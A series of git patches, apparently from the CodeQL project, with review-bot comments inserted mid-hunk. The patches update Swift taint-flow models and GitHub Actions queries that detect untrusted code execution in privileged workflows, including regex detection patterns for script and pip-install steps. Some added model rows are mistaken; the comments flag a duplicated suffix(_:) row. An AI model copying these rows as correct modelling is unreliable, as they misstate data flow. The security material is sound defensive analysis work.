diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected
index b321acf94e3..d7ab587c67a 100644
--- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected
+++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected
@@ -1,8 +1,6 @@ testFailures | optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | | optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | -| string.swift:237:35:238:1 | // $ tainted=217\n | Missing result: tainted=217 | -| string.swift:244:33:245:1 | // $ tainted=217\n | Missing result: tainted=217 | | string.swift:270:40:271:1 | // $ tainted=217\n | Missing result: tainted=217 | | string.swift:271:40:272:1 | // $ tainted=217\n | Missing result: tainted=217 | | string.swift:272:42:273:1 | // $ tainted=217\n | Missing result: tainted=217 | From be1264983806f98609e37ca8c6dfab21dc385619 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 1 Nov 2024 15:29:25 +0000 Subject: [PATCH 0675/1267] Swift: Update joined models for Swift 6. --- .../lib/codeql/swift/frameworks/StandardLibrary/Collection.qll | 2 ++ .../lib/codeql/swift/frameworks/StandardLibrary/Sequence.qll | 1 + .../dataflow/taint/libraries/TaintInline.expected | 3 --- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll index 26512f61736..6a5b1bdb777 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll 
@@ -43,6 +43,8 @@ private class CollectionSummaries extends SummaryModelCsv {
 ";BidirectionalCollection;true;dropLast(_:);;;Argument[-1];ReturnValue;taint",
 ";BidirectionalCollection;true;dropLast(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
 ";BidirectionalCollection;true;joined(separator:);;;Argument[-1..0];ReturnValue;taint",
+ ";BidirectionalCollection;true;joined(separator:);;;Argument[-1].CollectionElement;ReturnValue;taint",
+ ";BidirectionalCollection;true;joined(separator:);;;Argument[-1].CollectionElement.CollectionElement;ReturnValue.CollectionElement;value",
 ";BidirectionalCollection;true;last(where:);;;Argument[-1];ReturnValue;taint",
 ";BidirectionalCollection;true;popLast();;;Argument[-1];ReturnValue;taint",
 ";BidirectionalCollection;true;reversed();;;Argument[-1];ReturnValue;taint",
diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Sequence.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Sequence.qll
index 1c7774bc264..efe8d785222 100644
--- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Sequence.qll
+++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Sequence.qll
@@ -45,6 +45,7 @@ private class SequenceSummaries extends SummaryModelCsv {
 ";Sequence;true;joined();;;Argument[-1].CollectionElement.CollectionElement;ReturnValue.CollectionElement;value",
 ";Sequence;true;joined(separator:);;;Argument[0..-1];ReturnValue;taint",
 ";Sequence;true;joined(separator:);;;Argument[-1].CollectionElement;ReturnValue;taint",
+ ";Sequence;true;joined(separator:);;;Argument[-1].CollectionElement.CollectionElement;ReturnValue.CollectionElement;value",
 ";Sequence;true;first(where:);;;Argument[-1].CollectionElement;ReturnValue;value",
 ";Sequence;true;withContiguousStorageIfAvailable(_:);;;Argument[-1];Argument[0].Parameter[0].CollectionElement;taint",
 ";Sequence;true;withContiguousStorageIfAvailable(_:);;;Argument[-1].CollectionElement;Argument[0].Parameter[0].CollectionElement;value",
diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index d7ab587c67a..0953cc40f2b 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected @@ -1,9 +1,6 @@ testFailures | optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | | optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | -| string.swift:270:40:271:1 | // $ tainted=217\n | Missing result: tainted=217 | -| string.swift:271:40:272:1 | // $ tainted=217\n | Missing result: tainted=217 | -| string.swift:272:42:273:1 | // $ tainted=217\n | Missing result: tainted=217 | | string.swift:586:19:587:1 | // $ tainted=565\n | Missing result: tainted=565 | | string.swift:587:27:588:1 | // $ tainted=565\n | Missing result: tainted=565 | | string.swift:599:35:600:1 | // $ tainted=599\n | Missing result: tainted=599 | From 954fbc44bff03f5a8c8d9148189042724b82da0a Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 1 Nov 2024 16:03:24 +0000 Subject: [PATCH 0676/1267] Swift: Update prefix / suffix models for Swift 6. --- .../codeql/swift/frameworks/StandardLibrary/Collection.qll | 4 ++++ .../dataflow/taint/libraries/TaintInline.expected | 2 -- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll index 6a5b1bdb777..fe229de028e 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll 
@@ -49,6 +49,10 @@ private class CollectionSummaries extends SummaryModelCsv {
 ";BidirectionalCollection;true;popLast();;;Argument[-1];ReturnValue;taint",
 ";BidirectionalCollection;true;reversed();;;Argument[-1];ReturnValue;taint",
 ";BidirectionalCollection;true;reversed();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
+ ";BidirectionalCollection;true;suffix(_:);;;Argument[-1];ReturnValue;taint",
+ ";BidirectionalCollection;true;suffix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
+ ";BidirectionalCollection;true;suffix(from:);;;Argument[-1];ReturnValue;taint",
+ ";BidirectionalCollection;true;suffix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
 ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[-1];Argument[0].Parameter[0].CollectionElement;taint",
 ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[-1].CollectionElement;Argument[0].Parameter[0].CollectionElement;value",
 ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[0].Parameter[0].CollectionElement;Argument[-1].CollectionElement;value",
diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected
index 0953cc40f2b..bbe166c67ca 100644
--- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected
+++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected
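Review bot: The fourth added row in the `@@ -49,6 +49,10 @@` hunk repeats `suffix(_:)` where `suffix(from:)` was evidently intended, so `BidirectionalCollection.suffix(from:)` gets the container-level taint row but no element-level value row, and the `suffix(_:)` element row is simply duplicated. It should read `";BidirectionalCollection;true;suffix(from:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",`. The same slip appears in the `Collection` rows of the later "Further modelling updates" hunk (`@@ -15,20 +15,35 @@`), on the row added directly after the `Collection;true;suffix(from:)` taint row. The likely effect is missed element-content flow through `suffix(from:)`, that is, false negatives in queries that track tainted collection elements. The enclosing `row = [...]` list starts and ends outside the hunk.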
@@ -1,8 +1,6 @@ testFailures | optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | | optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | -| string.swift:586:19:587:1 | // $ tainted=565\n | Missing result: tainted=565 | -| string.swift:587:27:588:1 | // $ tainted=565\n | Missing result: tainted=565 | | string.swift:599:35:600:1 | // $ tainted=599\n | Missing result: tainted=599 | | string.swift:605:30:606:1 | // $ tainted=605\n | Missing result: tainted=605 | failures From f3ea75d27c79da66df470f47a9ca7ba97d684ad6 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 1 Nov 2024 15:22:10 +0000 Subject: [PATCH 0677/1267] Swift: Further modelling updates / gap filling that doesn't seem to affect tests. --- .../frameworks/StandardLibrary/Collection.qll | 15 +++++++++++++++ .../swift/frameworks/StandardLibrary/String.qll | 8 +++++++- 2 files changed, 22 insertions(+), 1 deletion(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll index fe229de028e..2d1c83d0c81 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll 
@@ -15,20 +15,35 @@ private class CollectionSummaries extends SummaryModelCsv { row = [ ";Collection;true;prefix(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;prefix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;prefix(through:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;prefix(through:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;prefix(upTo:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;prefix(upTo:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;prefix(while:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;prefix(while:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;suffix(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;suffix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;suffix(from:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;suffix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;dropFirst(_:);;;Argument[-1];ReturnValue;taint", ";Collection;true;dropFirst(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;dropLast(_:);;;Argument[-1];ReturnValue;taint", ";Collection;true;dropLast(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", + ";Collection;true;flatMap(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;flatMap(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", + ";Collection;true;map(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;map(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;split(maxSplits:omittingEmptySubsequences:whereSeparator:);;;Argument[-1];ReturnValue;taint", 
";Collection;true;split(separator:maxSplits:omittingEmptySubsequences:);;;Argument[-1];ReturnValue;taint", ";Collection;true;removeFirst();;;Argument[-1];ReturnValue;taint", ";Collection;true;popFirst();;;Argument[-1];ReturnValue;taint", ";Collection;true;randomElement();;;Argument[-1].CollectionElement;ReturnValue.OptionalSome;value", + ";Collection;true;randomElement(using:);;;Argument[-1].CollectionElement;ReturnValue.OptionalSome;value", + ";Collection;true;trimmingPrefix(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;trimmingPrefix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", + ";Collection;true;trimmingPrefix(while:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;trimmingPrefix(while:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";RangeReplaceableCollection;true;init(_:);;;Argument[0];ReturnValue.CollectionElement;taint", ";RangeReplaceableCollection;true;init(_:);;;Argument[0].CollectionElement;ReturnValue.CollectionElement;value", ";RangeReplaceableCollection;true;init(repeating:count:);;;Argument[0];ReturnValue.CollectionElement;value", diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll index eae5f78bb7f..e04feacf025 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll 
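Review bot: The new `map(_:)` and `flatMap(_:)` rows declare `Argument[-1].CollectionElement` to `ReturnValue.CollectionElement` as `value` flow, but the result elements are whatever the closure returns, not the input elements, so value-preserving flow is claimed where none is guaranteed. Routing the flow through the closure would be more precise, assuming the access-path syntax this file already uses for `Argument[0].Parameter[0]`: for `map`, `";Collection;true;map(_:);;;Argument[-1].CollectionElement;Argument[0].Parameter[0];value",` and `";Collection;true;map(_:);;;Argument[0].ReturnValue;ReturnValue.CollectionElement;value",`, with the `flatMap` result row reading from `Argument[0].ReturnValue.CollectionElement` instead. The commit subject says these rows do not affect any test, so a test with a closure that returns a constant would pin the intended behaviour. The enclosing list continues outside the hunk.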
@@ -167,12 +167,18 @@ private class StringFieldsInheritTaint extends TaintInheritingContent, "precomposedStringWithCompatibilityMapping", "removingPercentEncoding" ] or - namedTypeDecl.getFullName() = "CustomStringConvertible" and + namedTypeDecl.getFullName() = ["CustomStringConvertible"] and fieldDecl.getName() = "description" or namedTypeDecl.getFullName() = "CustomDebugStringConvertible" and fieldDecl.getName() = "debugDescription" or + namedTypeDecl.getFullName() = "CustomTestStringConvertible" and + fieldDecl.getName() = "testDescription" + or + namedTypeDecl.getFullName() = "CustomURLRepresentationParameterConvertible" and + fieldDecl.getName() = "urlRepresentationParameter" + or namedTypeDecl.getFullName() = "Substring" and fieldDecl.getName() = "base" ) and From 24c4e87f44203b3a0f1338dee746256b1006e066 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 1 Nov 2024 16:30:15 +0000 Subject: [PATCH 0678/1267] Swift: Fix stray []. --- swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll index e04feacf025..b773177f152 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll @@ -167,7 +167,7 @@ private class StringFieldsInheritTaint extends TaintInheritingContent, "precomposedStringWithCompatibilityMapping", "removingPercentEncoding" ] or - namedTypeDecl.getFullName() = ["CustomStringConvertible"] and + namedTypeDecl.getFullName() = "CustomStringConvertible" and fieldDecl.getName() = "description" or namedTypeDecl.getFullName() = "CustomDebugStringConvertible" and From ea20e9b33702be6a499b992c5f534e425d4cfcf8 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 3 Nov 2024 22:29:20 +0100 Subject: [PATCH 0679/1267] fix: Add versioned python binaries to poisonable steps --- ql/lib/ext/config/poisonable_steps.yml | 6 +++--- .../Security/CWE-829/.github/workflows/test4.yml | 1 + .../Security/CWE-829/.github/workflows/test7.yml | 1 + .../Security/CWE-829/UntrustedCheckoutCritical.expected | 9 ++++++--- 4 files changed, 11 insertions(+), 6 deletions(-) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index e32bc48a983..2f03b94b402 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -47,8 +47,8 @@ extensions: - ["poetry"] - ["pylint"] - ["pytest"] - - ["python\\s+-m\\s+pip\\s+install\\s+-r"] - - ["python\\s+-m\\s+pip\\s+install\\s+--requirement"] + - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+-r"] + - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+--requirement"] - ["rake"] - ["rails\\s+db:create"] - ["rails\\s+assets:precompile"] @@ -69,7 +69,7 @@ extensions: - ["(\\.\\s+[^\\s]+)\\b", 1] # eg: . venv/bin/activate - ["(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b", 2] - ["(node)\\s+([^\\s]+)(\\.js|\\.ts)\\b", 2] - - ["(python)\\s+([^\\s]+)\\.py\\b", 2] + - ["(python[\\d\\.]*)\\s+([^\\s]+)\\.py\\b", 2] - ["(ruby)\\s+([^\\s]+)\\.rb\\b", 2] - ["(go)\\s+(generate|run)\\s+([^\\s]+)\\.go\\b", 3] - ["(dotnet)\\s+([^\\s]+)\\.csproj\\b", 2] diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml index a07f2922fd7..f82f493cd6e 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -44,3 +44,4 @@ jobs: uses: actions/upload-pages-artifact@v1 with: path: './workspaces/www/build' + - run: python2.7 foo.py 
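Review bot: Only the script pattern `(python[\\d\\.]*)\\s+([^\\s]+)\\.py\\b` from the second hunk is exercised by the new fixture line `- run: python2.7 foo.py`; the two `pip install` patterns widened in the first hunk (`@@ -47,8 +47,8 @@`) have no versioned-interpreter fixture, so a regression there would go unnoticed and leave a detection gap for untrusted-checkout workflows. Adding a step such as `- run: python3 -m pip install -r requirements.txt` (constructed sample) to one of the CWE-829 test workflows would cover them. As a style point, the dot needs no escape inside a character class, so `[\\d.]*` is enough. How these patterns are anchored when matched is not visible in the hunk, so whether a suffix such as `python3.exe` should also match is worth confirming against the matcher.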
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml index 44f5602ee06..7466cb4435d 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml @@ -56,3 +56,4 @@ jobs: echo "$processed" >> $GITHUB_OUTPUT echo "BENCHEOF" >> $GITHUB_OUTPUT shell: bash + - run: python2.7 foo.py diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 85c2529c54c..ec3841c2384 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -189,7 +189,8 @@ edges | .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | | .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:47:4 | Uses Step | +| .github/workflows/test4.yml:43:7:47:4 | Uses Step | .github/workflows/test4.yml:47:7:47:28 | Run Step | | .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | | .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | 
@@ -202,7 +203,8 @@ edges | .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:59:30 | Run Step | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | 
@@ -342,7 +344,8 @@ edges | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:59:9:59:30 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:59:30 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test10.yml:25:9:30:2 | Run Step | 
.github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | From 80f2b24eebe308d7042405ac3b18478097aa69f6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 3 Nov 2024 22:29:50 +0100 Subject: [PATCH 0680/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d087f03b152..d34dad6665c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.83 +version: 0.1.84 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 073ddf5b457..007c2ebbe95 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.83 +version: 0.1.84 groups: [actions, queries] suites: codeql-suites extractor: javascript From db6f174b79161f1197d95d94864b6f323f20a7de Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 10:10:47 +0100 Subject: [PATCH 0681/1267] query: split if expression is always true query critical - if the if statement contains a known control check high - otherwise --- ...e.md => ExpressionIsAlwaysTrueCritical.md} | 0 ...e.ql => ExpressionIsAlwaysTrueCritical.ql} | 17 ++- .../CWE-571/ExpressionIsAlwaysTrueHigh.md | 63 ++++++++++ .../CWE-571/ExpressionIsAlwaysTrueHigh.ql | 29 +++++ .../.github/workflows/{test.yml => test1.yml} | 2 +- .../CWE-571/.github/workflows/test2.yml | 111 ++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.expected | 11 -- .../CWE-571/ExpressionIsAlwaysTrue.qlref | 1 - .../ExpressionIsAlwaysTrueCritical.expected | 11 ++ .../ExpressionIsAlwaysTrueCritical.qlref | 1 + .../ExpressionIsAlwaysTrueHigh.expected | 11 ++ .../CWE-571/ExpressionIsAlwaysTrueHigh.qlref | 1 + 12 files changed, 236 insertions(+), 22 deletions(-) rename ql/src/Security/CWE-571/{ExpressionIsAlwaysTrue.md => ExpressionIsAlwaysTrueCritical.md} (100%) rename ql/src/Security/CWE-571/{ExpressionIsAlwaysTrue.ql => ExpressionIsAlwaysTrueCritical.ql} (51%) create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql rename ql/test/query-tests/Security/CWE-571/.github/workflows/{test.yml => test1.yml} (97%) create mode 100644 ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml delete mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected delete mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref 
diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md similarity index 100% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md rename to ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql similarity index 51% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql rename to ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql index 58eab4c6022..6eaaca6e05d 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql @@ -1,27 +1,26 @@ /** - *: - * * @name If expression always true * @description Expressions used in If conditions with extra spaces are always true. * @kind problem * @security-severity 9.0 * @problem.severity error - * @precision high - * @id actions/if-expression-always-true + * @precision very-high + * @id actions/if-expression-always-true/critical * @tags actions * maintainability * external/cwe/cwe-275 */ import actions +import codeql.actions.security.ControlChecks -from If i +from ControlCheck i where - i.getCondition().matches("%${{%") and + i.(If).getCondition().matches("%${{%") and ( - not i.getCondition().matches("${{%") or - not i.getCondition().matches("%}}") + not i.(If).getCondition().matches("${{%") or + not i.(If).getCondition().matches("%}}") ) or - count(i.getCondition().splitAt("${{")) > 2 + count(i.(If).getCondition().splitAt("${{")) > 2 select i, "Expression always evaluates to true" diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md new file mode 100644 index 00000000000..1e7ea120cba --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md 
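Review bot: The last disjunct, `count(i.(If).getCondition().splitAt("${{")) > 2`, counts distinct split results as far as I can tell, so a condition whose segments repeat (constructed example: `${{ a }}${{ a }}`) yields 2 and is not reported, even though the concatenated string is always truthy. Because this variant covers control checks, a miss here means an always-passing gate goes unflagged. Testing for the third segment by index avoids the de-duplication: `exists(i.(If).getCondition().splitAt("${{", 2))`. The same expression appears in the new ExpressionIsAlwaysTrueHigh.ql and would need the same change.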
@@ -0,0 +1,63 @@ +# If Condition Always Evaluates to True + +## Description + +GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`. + +When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences. + +## Recommendation + +To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: + +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. +2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. +3. Test the workflow to ensure the `if` conditions behave 